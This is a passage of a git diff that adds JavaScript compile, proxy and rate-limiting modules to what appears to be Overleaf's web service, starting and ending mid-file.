(hasMainFile) { + rootResourcePath = 'main.tex' + } else if (numberOfDocsInProject === 1) { + // only one file, must be the main document + for (const path in docs) { + // Remove leading / + rootResourcePath = path.replace(/^\//, '') + } + } else { + throw new OError('no main file specified', { projectId }) + } + } + + const historyId = project.overleaf.history.id + if (!historyId) { + throw new OError('project does not have a history id', { projectId }) + } + for (let path in files) { + const file = files[path] + path = path.replace(/^\//, '') // Remove leading / + + const filestoreURL = `${Settings.apis.filestore.url}/project/${project._id}/file/${file._id}` + let url = filestoreURL + let fallbackURL + if (file.hash && Features.hasFeature('project-history-blobs')) { + const { bucket, key } = getBlobLocation(historyId, file.hash) + url = `${Settings.apis.filestore.url}/bucket/${bucket}/key/${key}` + fallbackURL = filestoreURL + } + resources.push({ + path, + url, + fallbackURL, + modified: file.created?.getTime(), + }) + } + + if (options.fileLineErrors) { + flags = ['-file-line-error'] + } + + return { + compile: { + options: { + buildId: options.buildId, + editorId: options.editorId, + compiler: project.compiler, + timeout: options.timeout, + imageName: project.imageName, + draft: Boolean(options.draft), + stopOnFirstError: Boolean(options.stopOnFirstError), + check: options.check, + syncType: options.syncType, + syncState: options.syncState, + compileGroup: options.compileGroup, + compileFromClsiCache: options.compileFromClsiCache, + populateClsiCache: 
options.populateClsiCache,
+        enablePdfCaching:
+          (Settings.enablePdfCaching && options.enablePdfCaching) || false,
+        pdfCachingMinChunkSize: options.pdfCachingMinChunkSize,
+        flags,
+        metricsMethod: options.compileGroup,
+      },
+      rootResourcePath,
+      resources,
+    },
+  }
+}
+
+async function wordCount(projectId, userId, file, options, clsiserverid) {
+  const { compileBackendClass, compileGroup } = options
+  const req = await _buildRequest(projectId, options)
+  const filename = file || req.compile.rootResourcePath
+  const url = _getCompilerUrl(
+    compileBackendClass,
+    compileGroup,
+    projectId,
+    userId,
+    'wordcount'
+  )
+  url.searchParams.set('file', filename)
+  url.searchParams.set('image', req.compile.options.imageName)
+
+  const opts = {
+    method: 'GET',
+  }
+  const { body } = await _makeRequestWithClsiServerId(
+    projectId,
+    userId,
+    compileGroup,
+    compileBackendClass,
+    url,
+    opts,
+    clsiserverid
+  )
+  return body
+}
+
+function _getClsiServerIdFromResponse(response) {
+  const setCookieHeaders = response.headers.raw()['set-cookie'] ?? []
+  for (const header of setCookieHeaders) {
+    const cookie = Cookie.parse(header)
+    if (cookie.key === Settings.clsiCookie.key) {
+      return cookie.value
+    }
+  }
+  return null
+}
+
+module.exports = {
+  sendRequest: callbackifyMultiResult(sendRequest, [
+    'status',
+    'outputFiles',
+    'clsiServerId',
+    'validationProblems',
+    'stats',
+    'timings',
+    'outputUrlPrefix',
+    'buildId',
+  ]),
+  sendExternalRequest: callbackifyMultiResult(sendExternalRequest, [
+    'status',
+    'outputFiles',
+    'clsiServerId',
+    'validationProblems',
+    'stats',
+    'timings',
+    'outputUrlPrefix',
+  ]),
+  stopCompile: callbackify(stopCompile),
+  deleteAuxFiles: callbackify(deleteAuxFiles),
+  getOutputFileStream: callbackify(getOutputFileStream),
+  wordCount: callbackify(wordCount),
+  promises: {
+    sendRequest,
+    sendExternalRequest,
+    stopCompile,
+    deleteAuxFiles,
+    getOutputFileStream,
+    wordCount,
+  },
+}
diff --git a/services/web/app/src/Features/Compile/ClsiStateManager.js b/services/web/app/src/Features/Compile/ClsiStateManager.js
new file mode 100644
index 0000000..e1914b9
--- /dev/null
+++ b/services/web/app/src/Features/Compile/ClsiStateManager.js
@@ -0,0 +1,72 @@
+/* eslint-disable
+    n/handle-callback-err,
+    max-len,
+    no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/*
+ * decaffeinate suggestions:
+ * DS101: Remove unnecessary use of Array.from
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS205: Consider reworking code to avoid use of IIFEs
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+let ClsiStateManager
+const Settings = require('@overleaf/settings')
+const logger = require('@overleaf/logger')
+const crypto = require('crypto')
+const ProjectEntityHandler = require('../Project/ProjectEntityHandler')
+
+// The "state" of a project is a hash of the relevant attributes in the
+// project object; in this case we only need the rootFolder.
+//
+// The idea is that it will change if any doc or file is
+// created/renamed/deleted, and also if the content of any file (not
+// doc) changes.
+//
+// When the hash changes the full set of files on the CLSI will need to
+// be updated. If it doesn't change then we can overwrite changed docs
+// in place on the clsi, getting them from the docupdater.
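+//
+// For illustration (hypothetical ids), the hash input built below is a
+// sorted entity list plus the compile options, e.g.
+//   "5e9c01:/main.tex"                          (doc  -> id:path)
+//   "603faa:12:Mon Apr 01 2024:/figures/a.png"  (file -> id:rev:created:path)
+//   "option draft:true"
+// joined with newlines and hashed with SHA-1.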
+// +// The docupdater is responsible for setting the key in redis, and +// unsetting it if it removes any documents from the doc updater. + +const buildState = s => + crypto.createHash('sha1').update(s, 'utf8').digest('hex') + +module.exports = ClsiStateManager = { + computeHash(project, options) { + const { docs, files } = + ProjectEntityHandler.getAllEntitiesFromProject(project) + const fileList = Array.from(files || []).map( + f => `${f.file._id}:${f.file.rev}:${f.file.created}:${f.path}` + ) + const docList = Array.from(docs || []).map(d => `${d.doc._id}:${d.path}`) + const sortedEntityList = [ + ...Array.from(docList), + ...Array.from(fileList), + ].sort() + // ignore the isAutoCompile options as it doesn't affect the + // output, but include all other options e.g. draft + const optionsList = (() => { + const result = [] + const object = options || {} + for (const key in object) { + const value = object[key] + if (!['isAutoCompile'].includes(key)) { + result.push(`option ${key}:${value}`) + } + } + return result + })() + const sortedOptionsList = optionsList.sort() + const hash = buildState( + [...Array.from(sortedEntityList), ...Array.from(sortedOptionsList)].join( + '\n' + ) + ) + return hash + }, +} diff --git a/services/web/app/src/Features/Compile/CompileController.js b/services/web/app/src/Features/Compile/CompileController.js new file mode 100644 index 0000000..c981e93 --- /dev/null +++ b/services/web/app/src/Features/Compile/CompileController.js @@ -0,0 +1,802 @@ +let CompileController +const { URL, URLSearchParams } = require('url') +const { pipeline } = require('stream/promises') +const { Cookie } = require('tough-cookie') +const OError = require('@overleaf/o-error') +const Metrics = require('@overleaf/metrics') +const ProjectGetter = require('../Project/ProjectGetter') +const CompileManager = require('./CompileManager') +const ClsiManager = require('./ClsiManager') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const SessionManager = require('../Authentication/SessionManager') +const { RateLimiter } = require('../../infrastructure/RateLimiter') +const ClsiCookieManager = require('./ClsiCookieManager')( + Settings.apis.clsi?.backendGroupName +) +const Path = require('path') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const SplitTestHandler = require('../SplitTests/SplitTestHandler') +const { callbackify } = require('@overleaf/promise-utils') +const { + fetchStreamWithResponse, + RequestFailedError, +} = require('@overleaf/fetch-utils') + +const COMPILE_TIMEOUT_MS = 10 * 60 * 1000 + +const pdfDownloadRateLimiter = new RateLimiter('full-pdf-download', { + points: 1000, + duration: 60 * 60, +}) + +function getOutputFilesArchiveSpecification(projectId, userId, buildId) { + const fileName = 'output.zip' + return { + path: fileName, + url: CompileController._getFileUrl(projectId, userId, buildId, fileName), + type: 'zip', + } +} + +function getImageNameForProject(projectId, callback) { + ProjectGetter.getProject(projectId, { imageName: 1 }, (err, project) => { + if (err) return callback(err) + if (!project) return callback(new Error('project not found')) + callback(null, project.imageName) + }) +} + +async function getPdfCachingMinChunkSize(req, res) { + const { variant } = await SplitTestHandler.promises.getAssignment( + req, + res, + 'pdf-caching-min-chunk-size' + ) + if (variant === 'default') return 1_000_000 + return parseInt(variant, 10) +} + +async function _getSplitTestOptions(req, res) { + // Use the 
query flags from the editor request for overriding the split test. + let query = {} + try { + const u = new URL(req.headers.referer || req.url, Settings.siteUrl) + query = Object.fromEntries(u.searchParams.entries()) + } catch (e) {} + const editorReq = { ...req, query } + + // Lookup the clsi-cache flag in the backend. + // We may need to turn off the feature on a short notice, without requiring + // all users to reload their editor page to disable the feature. + const { variant: compileFromClsiCacheVariant } = + await SplitTestHandler.promises.getAssignment( + editorReq, + res, + 'compile-from-clsi-cache' + ) + const compileFromClsiCache = compileFromClsiCacheVariant === 'enabled' + const { variant: populateClsiCacheVariant } = + await SplitTestHandler.promises.getAssignment( + editorReq, + res, + 'populate-clsi-cache' + ) + const populateClsiCache = populateClsiCacheVariant === 'enabled' + + const pdfDownloadDomain = Settings.pdfDownloadDomain + + if (!req.query.enable_pdf_caching) { + // The frontend does not want to do pdf caching. + return { + compileFromClsiCache, + populateClsiCache, + pdfDownloadDomain, + enablePdfCaching: false, + } + } + + // Double check with the latest split test assignment. + // We may need to turn off the feature on a short notice, without requiring + // all users to reload their editor page to disable the feature. + const { variant } = await SplitTestHandler.promises.getAssignment( + editorReq, + res, + 'pdf-caching-mode' + ) + const enablePdfCaching = variant === 'enabled' + if (!enablePdfCaching) { + // Skip the lookup of the chunk size when caching is not enabled. + return { + compileFromClsiCache, + populateClsiCache, + pdfDownloadDomain, + enablePdfCaching: false, + } + } + const pdfCachingMinChunkSize = await getPdfCachingMinChunkSize(editorReq, res) + return { + compileFromClsiCache, + populateClsiCache, + pdfDownloadDomain, + enablePdfCaching, + pdfCachingMinChunkSize, + } +} +const getSplitTestOptionsCb = callbackify(_getSplitTestOptions) + +module.exports = CompileController = { + compile(req, res, next) { + res.setTimeout(COMPILE_TIMEOUT_MS) + const projectId = req.params.Project_id + const isAutoCompile = !!req.query.auto_compile + const fileLineErrors = !!req.query.file_line_errors + const stopOnFirstError = !!req.body.stopOnFirstError + const userId = SessionManager.getLoggedInUserId(req.session) + const options = { + isAutoCompile, + fileLineErrors, + stopOnFirstError, + editorId: req.body.editorId, + } + + if (req.body.rootDoc_id) { + options.rootDoc_id = req.body.rootDoc_id + } else if ( + req.body.settingsOverride && + req.body.settingsOverride.rootDoc_id + ) { + // Can be removed after deploy + options.rootDoc_id = req.body.settingsOverride.rootDoc_id + } + if (req.body.compiler) { + options.compiler = req.body.compiler + } + if (req.body.draft) { + options.draft = req.body.draft + } + if (['validate', 'error', 'silent'].includes(req.body.check)) { + options.check = req.body.check + } + if (req.body.incrementalCompilesEnabled) { + options.incrementalCompilesEnabled = true + } + + getSplitTestOptionsCb(req, res, (err, splitTestOptions) => { + if (err) return next(err) + let { + compileFromClsiCache, + populateClsiCache, + enablePdfCaching, + pdfCachingMinChunkSize, + pdfDownloadDomain, + } = splitTestOptions + options.compileFromClsiCache = compileFromClsiCache + options.populateClsiCache = populateClsiCache + options.enablePdfCaching = enablePdfCaching + if (enablePdfCaching) { + options.pdfCachingMinChunkSize = pdfCachingMinChunkSize + } 
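+      // For illustration: at this point `options` has been extended with the
+      // split-test results, roughly
+      //   { compileFromClsiCache, populateClsiCache, enablePdfCaching,
+      //     pdfCachingMinChunkSize? }
+      // where pdfCachingMinChunkSize is only set when caching is enabled.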
+ + CompileManager.compile( + projectId, + userId, + options, + ( + error, + status, + outputFiles, + clsiServerId, + limits, + validationProblems, + stats, + timings, + outputUrlPrefix, + buildId + ) => { + if (error) { + Metrics.inc('compile-error') + return next(error) + } + Metrics.inc('compile-status', 1, { status }) + if (pdfDownloadDomain && outputUrlPrefix) { + pdfDownloadDomain += outputUrlPrefix + } + + if ( + limits && + SplitTestHandler.getPercentile( + AnalyticsManager.getIdsFromSession(req.session).analyticsId, + 'compile-result-backend', + 'release' + ) === 1 + ) { + // For a compile request to be sent to clsi we need limits. + // If we get here without having the limits object populated, it is + // a reasonable assumption to make that nothing was compiled. + // We need to know the limits in order to make use of the events. + AnalyticsManager.recordEventForSession( + req.session, + 'compile-result-backend', + { + projectId, + ownerAnalyticsId: limits.ownerAnalyticsId, + status, + compileTime: timings?.compileE2E, + timeout: limits.timeout === 60 ? 'short' : 'long', + server: clsiServerId?.includes('-c2d-') ? 'faster' : 'normal', + isAutoCompile, + isInitialCompile: stats?.isInitialCompile === 1, + restoredClsiCache: stats?.restoredClsiCache === 1, + stopOnFirstError, + } + ) + } + + const outputFilesArchive = buildId + ? getOutputFilesArchiveSpecification(projectId, userId, buildId) + : null + + res.json({ + status, + outputFiles, + outputFilesArchive, + compileGroup: limits?.compileGroup, + clsiServerId, + validationProblems, + stats, + timings, + outputUrlPrefix, + pdfDownloadDomain, + pdfCachingMinChunkSize, + }) + } + ) + }) + }, + + stopCompile(req, res, next) { + const projectId = req.params.Project_id + const userId = SessionManager.getLoggedInUserId(req.session) + CompileManager.stopCompile(projectId, userId, function (error) { + if (error) { + return next(error) + } + res.sendStatus(200) + }) + }, + + // Used for submissions through the public API + compileSubmission(req, res, next) { + res.setTimeout(COMPILE_TIMEOUT_MS) + const submissionId = req.params.submission_id + const options = {} + if (req.body?.rootResourcePath != null) { + options.rootResourcePath = req.body.rootResourcePath + } + if (req.body?.compiler) { + options.compiler = req.body.compiler + } + if (req.body?.draft) { + options.draft = req.body.draft + } + if (['validate', 'error', 'silent'].includes(req.body?.check)) { + options.check = req.body.check + } + options.compileGroup = + req.body?.compileGroup || Settings.defaultFeatures.compileGroup + options.compileBackendClass = Settings.apis.clsi.submissionBackendClass + options.timeout = + req.body?.timeout || Settings.defaultFeatures.compileTimeout + ClsiManager.sendExternalRequest( + submissionId, + req.body, + options, + function (error, status, outputFiles, clsiServerId, validationProblems) { + if (error) { + return next(error) + } + res.json({ + status, + outputFiles, + clsiServerId, + validationProblems, + }) + } + ) + }, + + _getSplitTestOptions, + + _getUserIdForCompile(req) { + if (!Settings.disablePerUserCompiles) { + return SessionManager.getLoggedInUserId(req.session) + } + return null + }, + _compileAsUser(req, callback) { + callback(null, CompileController._getUserIdForCompile(req)) + }, + _downloadAsUser(req, callback) { + callback(null, CompileController._getUserIdForCompile(req)) + }, + + downloadPdf(req, res, next) { + Metrics.inc('pdf-downloads') + const projectId = req.params.Project_id + const rateLimit = function (callback) { + 
pdfDownloadRateLimiter + .consume(req.ip, 1, { method: 'ip' }) + .then(() => { + callback(null, true) + }) + .catch(err => { + if (err instanceof Error) { + callback(err) + } else { + callback(null, false) + } + }) + } + + ProjectGetter.getProject(projectId, { name: 1 }, function (err, project) { + if (err) { + return next(err) + } + res.contentType('application/pdf') + const filename = `${CompileController._getSafeProjectName(project)}.pdf` + + if (req.query.popupDownload) { + res.setContentDisposition('attachment', { filename }) + } else { + res.setContentDisposition('inline', { filename }) + } + + rateLimit(function (err, canContinue) { + if (err) { + logger.err({ err }, 'error checking rate limit for pdf download') + res.sendStatus(500) + } else if (!canContinue) { + logger.debug( + { projectId, ip: req.ip }, + 'rate limit hit downloading pdf' + ) + res.sendStatus(500) + } else { + CompileController._downloadAsUser(req, function (error, userId) { + if (error) { + return next(error) + } + const url = CompileController._getFileUrl( + projectId, + userId, + req.params.build_id, + 'output.pdf' + ) + CompileController.proxyToClsi( + projectId, + 'output-file', + url, + {}, + req, + res, + next + ) + }) + } + }) + }) + }, + + _getSafeProjectName(project) { + return project.name.replace(/[^\p{L}\p{Nd}]/gu, '_') + }, + + deleteAuxFiles(req, res, next) { + const projectId = req.params.Project_id + const { clsiserverid } = req.query + CompileController._compileAsUser(req, function (error, userId) { + if (error) { + return next(error) + } + CompileManager.deleteAuxFiles( + projectId, + userId, + clsiserverid, + function (error) { + if (error) { + return next(error) + } + res.sendStatus(200) + } + ) + }) + }, + + // this is only used by templates, so is not called with a userId + compileAndDownloadPdf(req, res, next) { + const projectId = req.params.project_id + // pass userId as null, since templates are an "anonymous" compile + CompileManager.compile(projectId, null, {}, (err, _status, outputFiles) => { + if (err) { + logger.err( + { err, projectId }, + 'something went wrong compile and downloading pdf' + ) + res.sendStatus(500) + return + } + const pdf = outputFiles.find(f => f.path === 'output.pdf') + if (!pdf) { + logger.warn( + { projectId }, + 'something went wrong compile and downloading pdf: no pdf' + ) + res.sendStatus(500) + return + } + CompileController.proxyToClsi( + projectId, + 'output-file', + pdf.url, + {}, + req, + res, + next + ) + }) + }, + + getFileFromClsi(req, res, next) { + const projectId = req.params.Project_id + CompileController._downloadAsUser(req, function (error, userId) { + if (error) { + return next(error) + } + + const qs = {} + + const url = CompileController._getFileUrl( + projectId, + userId, + req.params.build_id, + req.params.file + ) + CompileController.proxyToClsi( + projectId, + 'output-file', + url, + qs, + req, + res, + next + ) + }) + }, + + getFileFromClsiWithoutUser(req, res, next) { + const submissionId = req.params.submission_id + const url = CompileController._getFileUrl( + submissionId, + null, + req.params.build_id, + req.params.file + ) + const limits = { + compileGroup: + req.body?.compileGroup || + req.query?.compileGroup || + Settings.defaultFeatures.compileGroup, + compileBackendClass: Settings.apis.clsi.submissionBackendClass, + } + CompileController.proxyToClsiWithLimits( + submissionId, + 'output-file', + url, + {}, + limits, + req, + res, + next + ) + }, + + // compute a GET file url for a given project, user (optional), build 
(optional) and file + _getFileUrl(projectId, userId, buildId, file) { + let url + if (userId != null && buildId != null) { + url = `/project/${projectId}/user/${userId}/build/${buildId}/output/${file}` + } else if (userId != null) { + url = `/project/${projectId}/user/${userId}/output/${file}` + } else if (buildId != null) { + url = `/project/${projectId}/build/${buildId}/output/${file}` + } else { + url = `/project/${projectId}/output/${file}` + } + return url + }, + + // compute a POST url for a project, user (optional) and action + _getUrl(projectId, userId, action) { + let path = `/project/${projectId}` + if (userId != null) { + path += `/user/${userId}` + } + return `${path}/${action}` + }, + + proxySyncPdf(req, res, next) { + const projectId = req.params.Project_id + const { page, h, v, editorId, buildId } = req.query + if (!page?.match(/^\d+$/)) { + return next(new Error('invalid page parameter')) + } + if (!h?.match(/^-?\d+\.\d+$/)) { + return next(new Error('invalid h parameter')) + } + if (!v?.match(/^-?\d+\.\d+$/)) { + return next(new Error('invalid v parameter')) + } + // whether this request is going to a per-user container + CompileController._compileAsUser(req, function (error, userId) { + if (error) { + return next(error) + } + getImageNameForProject(projectId, (error, imageName) => { + if (error) return next(error) + + getSplitTestOptionsCb(req, res, (error, splitTestOptions) => { + if (error) return next(error) + const { compileFromClsiCache } = splitTestOptions + + const url = CompileController._getUrl(projectId, userId, 'sync/pdf') + + CompileController.proxyToClsi( + projectId, + 'sync-to-pdf', + url, + { page, h, v, imageName, editorId, buildId, compileFromClsiCache }, + req, + res, + next + ) + }) + }) + }) + }, + + proxySyncCode(req, res, next) { + const projectId = req.params.Project_id + const { file, line, column, editorId, buildId } = req.query + if (file == null) { + return next(new Error('missing file parameter')) + } + // Check that we are dealing with a simple file path (this is not + // strictly needed because synctex uses this parameter as a label + // to look up in the synctex output, and does not open the file + // itself). 
Since we have valid synctex paths like foo/./bar we + // allow those by replacing /./ with / + const testPath = file.replace('/./', '/') + if (Path.resolve('/', testPath) !== `/${testPath}`) { + return next(new Error('invalid file parameter')) + } + if (!line?.match(/^\d+$/)) { + return next(new Error('invalid line parameter')) + } + if (!column?.match(/^\d+$/)) { + return next(new Error('invalid column parameter')) + } + CompileController._compileAsUser(req, function (error, userId) { + if (error) { + return next(error) + } + getImageNameForProject(projectId, (error, imageName) => { + if (error) return next(error) + + getSplitTestOptionsCb(req, res, (error, splitTestOptions) => { + if (error) return next(error) + const { compileFromClsiCache } = splitTestOptions + + const url = CompileController._getUrl(projectId, userId, 'sync/code') + CompileController.proxyToClsi( + projectId, + 'sync-to-code', + url, + { + file, + line, + column, + imageName, + editorId, + buildId, + compileFromClsiCache, + }, + req, + res, + next + ) + }) + }) + }) + }, + + proxyToClsi(projectId, action, url, qs, req, res, next) { + CompileManager.getProjectCompileLimits(projectId, function (error, limits) { + if (error) { + return next(error) + } + CompileController.proxyToClsiWithLimits( + projectId, + action, + url, + qs, + limits, + req, + res, + next + ) + }) + }, + + proxyToClsiWithLimits(projectId, action, url, qs, limits, req, res, next) { + _getPersistenceOptions( + req, + projectId, + limits.compileGroup, + limits.compileBackendClass, + (err, persistenceOptions) => { + if (err) { + OError.tag(err, 'error getting cookie jar for clsi request') + return next(err) + } + url = new URL(`${Settings.apis.clsi.url}${url}`) + url.search = new URLSearchParams({ + ...persistenceOptions.qs, + ...qs, + }).toString() + const timer = new Metrics.Timer( + 'proxy_to_clsi', + 1, + { path: action }, + [0, 100, 1000, 2000, 5000, 10000, 15000, 20000, 30000, 45000, 60000] + ) + Metrics.inc('proxy_to_clsi', 1, { path: action, status: 'start' }) + fetchStreamWithResponse(url.href, { + method: req.method, + signal: AbortSignal.timeout(60 * 1000), + headers: persistenceOptions.headers, + }) + .then(({ stream, response }) => { + if (req.destroyed) { + // The client has disconnected already, avoid trying to write into the broken connection. + Metrics.inc('proxy_to_clsi', 1, { + path: action, + status: 'req-aborted', + }) + return + } + Metrics.inc('proxy_to_clsi', 1, { + path: action, + status: response.status, + }) + + for (const key of ['Content-Length', 'Content-Type']) { + if (response.headers.has(key)) { + res.setHeader(key, response.headers.get(key)) + } + } + res.writeHead(response.status) + return pipeline(stream, res) + }) + .then(() => { + timer.labels.status = 'success' + timer.done() + }) + .catch(err => { + const reqAborted = Boolean(req.destroyed) + const status = reqAborted ? 
'req-aborted-late' : 'error' + timer.labels.status = status + const duration = timer.done() + Metrics.inc('proxy_to_clsi', 1, { path: action, status }) + const streamingStarted = Boolean(res.headersSent) + if (!streamingStarted) { + if (err instanceof RequestFailedError) { + res.sendStatus(err.response.status) + } else { + res.sendStatus(500) + } + } + if ( + streamingStarted && + reqAborted && + err.code === 'ERR_STREAM_PREMATURE_CLOSE' + ) { + // Ignore noisy spurious error + return + } + if ( + err instanceof RequestFailedError && + ['sync-to-code', 'sync-to-pdf', 'output-file'].includes(action) + ) { + // Ignore noisy error + // https://github.com/overleaf/internal/issues/15201 + return + } + logger.warn( + { + err, + projectId, + url, + action, + reqAborted, + streamingStarted, + duration, + }, + 'CLSI proxy error' + ) + }) + } + ) + }, + + wordCount(req, res, next) { + const projectId = req.params.Project_id + const file = req.query.file || false + const { clsiserverid } = req.query + CompileController._compileAsUser(req, function (error, userId) { + if (error) { + return next(error) + } + CompileManager.wordCount( + projectId, + userId, + file, + clsiserverid, + function (error, body) { + if (error) { + return next(error) + } + res.json(body) + } + ) + }) + }, +} + +function _getPersistenceOptions( + req, + projectId, + compileGroup, + compileBackendClass, + callback +) { + const { clsiserverid } = req.query + const userId = SessionManager.getLoggedInUserId(req) + if (clsiserverid && typeof clsiserverid === 'string') { + callback(null, { + qs: { clsiserverid, compileGroup, compileBackendClass }, + headers: {}, + }) + } else { + ClsiCookieManager.getServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + (err, clsiServerId) => { + if (err) return callback(err) + callback(null, { + qs: { compileGroup, compileBackendClass }, + headers: clsiServerId + ? 
{
+                Cookie: new Cookie({
+                  key: Settings.clsiCookie.key,
+                  value: clsiServerId,
+                }).cookieString(),
+              }
+            : {},
+        })
+      }
+    )
+  }
+}
diff --git a/services/web/app/src/Features/Compile/CompileManager.js b/services/web/app/src/Features/Compile/CompileManager.js
new file mode 100644
index 0000000..9b54048
--- /dev/null
+++ b/services/web/app/src/Features/Compile/CompileManager.js
@@ -0,0 +1,249 @@
+let CompileManager
+const Crypto = require('crypto')
+const Settings = require('@overleaf/settings')
+const RedisWrapper = require('../../infrastructure/RedisWrapper')
+const rclient = RedisWrapper.client('clsi_recently_compiled')
+const ProjectGetter = require('../Project/ProjectGetter')
+const ProjectRootDocManager = require('../Project/ProjectRootDocManager')
+const UserGetter = require('../User/UserGetter')
+const ClsiManager = require('./ClsiManager')
+const Metrics = require('@overleaf/metrics')
+const { RateLimiter } = require('../../infrastructure/RateLimiter')
+const UserAnalyticsIdCache = require('../Analytics/UserAnalyticsIdCache')
+const {
+  callbackify,
+  callbackifyMultiResult,
+} = require('@overleaf/promise-utils')
+
+function instrumentWithTimer(fn, key) {
+  return async (...args) => {
+    const timer = new Metrics.Timer(key)
+    try {
+      return await fn(...args)
+    } finally {
+      timer.done()
+    }
+  }
+}
+
+function generateBuildId() {
+  return `${Date.now().toString(16)}-${Crypto.randomBytes(8).toString('hex')}`
+}
+
+async function compile(projectId, userId, options = {}) {
+  const recentlyCompiled = await CompileManager._checkIfRecentlyCompiled(
+    projectId,
+    userId
+  )
+  if (recentlyCompiled) {
+    return { status: 'too-recently-compiled', outputFiles: [] }
+  }
+
+  try {
+    const canCompile = await CompileManager._checkIfAutoCompileLimitHasBeenHit(
+      options.isAutoCompile,
+      'everyone'
+    )
+    if (!canCompile) {
+      return { status: 'autocompile-backoff', outputFiles: [] }
+    }
+  } catch (error) {
+    return { status: 'autocompile-backoff', outputFiles: [] }
+  }
+
+  await ProjectRootDocManager.promises.ensureRootDocumentIsSet(projectId)
+
+  const limits =
+    await CompileManager.promises.getProjectCompileLimits(projectId)
+  for (const key in limits) {
+    const value = limits[key]
+    options[key] = value
+  }
+
+  try {
+    const canCompile = await CompileManager._checkCompileGroupAutoCompileLimit(
+      options.isAutoCompile,
+      limits.compileGroup
+    )
+    if (!canCompile) {
+      return { status: 'autocompile-backoff', outputFiles: [] }
+    }
+  } catch (error) {
+    return { status: 'autocompile-backoff', outputFiles: [] }
+  }
+
+  // Generate the buildId ahead of fetching the project content from redis/mongo so that the buildId's timestamp is before any lastUpdated date.
+  options.buildId = generateBuildId()
+
+  // only pass userId down to clsi if this is a per-user compile
+  const compileAsUser = Settings.disablePerUserCompiles ?
undefined : userId + const { + status, + outputFiles, + clsiServerId, + validationProblems, + stats, + timings, + outputUrlPrefix, + buildId, + } = await ClsiManager.promises.sendRequest(projectId, compileAsUser, options) + + return { + status, + outputFiles, + clsiServerId, + limits, + validationProblems, + stats, + timings, + outputUrlPrefix, + buildId, + } +} + +const instrumentedCompile = instrumentWithTimer(compile, 'editor.compile') + +async function getProjectCompileLimits(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: 1, + }) + + const owner = await UserGetter.promises.getUser(project.owner_ref, { + _id: 1, + alphaProgram: 1, + analyticsId: 1, + betaProgram: 1, + features: 1, + }) + + const ownerFeatures = (owner && owner.features) || {} + // put alpha users into their own compile group + if (owner && owner.alphaProgram) { + ownerFeatures.compileGroup = 'alpha' + } + const analyticsId = await UserAnalyticsIdCache.get(owner._id) + + const compileGroup = + ownerFeatures.compileGroup || Settings.defaultFeatures.compileGroup + const limits = { + timeout: + ownerFeatures.compileTimeout || Settings.defaultFeatures.compileTimeout, + compileGroup, + compileBackendClass: compileGroup === 'standard' ? 'n2d' : 'c2d', + ownerAnalyticsId: analyticsId, + } + return limits +} + +async function wordCount(projectId, userId, file, clsiserverid) { + const limits = + await CompileManager.promises.getProjectCompileLimits(projectId) + return await ClsiManager.promises.wordCount( + projectId, + userId, + file, + limits, + clsiserverid + ) +} + +async function stopCompile(projectId, userId) { + const limits = + await CompileManager.promises.getProjectCompileLimits(projectId) + + return await ClsiManager.promises.stopCompile(projectId, userId, limits) +} + +async function deleteAuxFiles(projectId, userId, clsiserverid) { + const limits = + await CompileManager.promises.getProjectCompileLimits(projectId) + + return await ClsiManager.promises.deleteAuxFiles( + projectId, + userId, + limits, + clsiserverid + ) +} + +module.exports = CompileManager = { + promises: { + compile: instrumentedCompile, + deleteAuxFiles, + getProjectCompileLimits, + stopCompile, + wordCount, + }, + compile: callbackifyMultiResult(instrumentedCompile, [ + 'status', + 'outputFiles', + 'clsiServerId', + 'limits', + 'validationProblems', + 'stats', + 'timings', + 'outputUrlPrefix', + 'buildId', + ]), + + stopCompile: callbackify(stopCompile), + + deleteAuxFiles: callbackify(deleteAuxFiles), + + getProjectCompileLimits: callbackify(getProjectCompileLimits), + + COMPILE_DELAY: 1, // seconds + async _checkIfRecentlyCompiled(projectId, userId) { + const key = `compile:${projectId}:${userId}` + const ok = await rclient.set(key, true, 'EX', this.COMPILE_DELAY, 'NX') + return ok !== 'OK' + }, + + async _checkCompileGroupAutoCompileLimit(isAutoCompile, compileGroup) { + if (!isAutoCompile) { + return true + } + if (compileGroup === 'standard') { + // apply extra limits to the standard compile group + return await CompileManager._checkIfAutoCompileLimitHasBeenHit( + isAutoCompile, + compileGroup + ) + } else { + Metrics.inc(`auto-compile-${compileGroup}`) + return true + } + }, // always allow priority group users to compile + + async _checkIfAutoCompileLimitHasBeenHit(isAutoCompile, compileGroup) { + if (!isAutoCompile) { + return true + } + Metrics.inc(`auto-compile-${compileGroup}`) + const rateLimiter = getAutoCompileRateLimiter(compileGroup) + try { + await rateLimiter.consume('global', 1, { 
method: 'global' }) + return true + } catch (e) { + // Don't differentiate between errors and rate limits. Silently trigger + // the rate limit if there's an error consuming the points. + Metrics.inc(`auto-compile-${compileGroup}-limited`) + return false + } + }, + + wordCount: callbackify(wordCount), +} + +const autoCompileRateLimiters = new Map() +function getAutoCompileRateLimiter(compileGroup) { + let rateLimiter = autoCompileRateLimiters.get(compileGroup) + if (rateLimiter == null) { + rateLimiter = new RateLimiter(`auto-compile:${compileGroup}`, { + points: Settings.rateLimit.autoCompile[compileGroup] || 25, + duration: 20, + }) + autoCompileRateLimiters.set(compileGroup, rateLimiter) + } + return rateLimiter +} diff --git a/services/web/app/src/Features/Contacts/ContactController.mjs b/services/web/app/src/Features/Contacts/ContactController.mjs new file mode 100644 index 0000000..12567d6 --- /dev/null +++ b/services/web/app/src/Features/Contacts/ContactController.mjs @@ -0,0 +1,60 @@ +import SessionManager from '../Authentication/SessionManager.js' +import ContactManager from './ContactManager.js' +import UserGetter from '../User/UserGetter.js' +import Modules from '../../infrastructure/Modules.js' +import { expressify } from '@overleaf/promise-utils' + +function _formatContact(contact) { + return { + id: contact._id?.toString(), + email: contact.email || '', + first_name: contact.first_name || '', + last_name: contact.last_name || '', + type: 'user', + } +} + +async function getContacts(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + + const contactIds = await ContactManager.promises.getContactIds(userId, { + limit: 50, + }) + + let contacts = await UserGetter.promises.getUsers(contactIds, { + email: 1, + first_name: 1, + last_name: 1, + holdingAccount: 1, + }) + + // UserGetter.getUsers may not 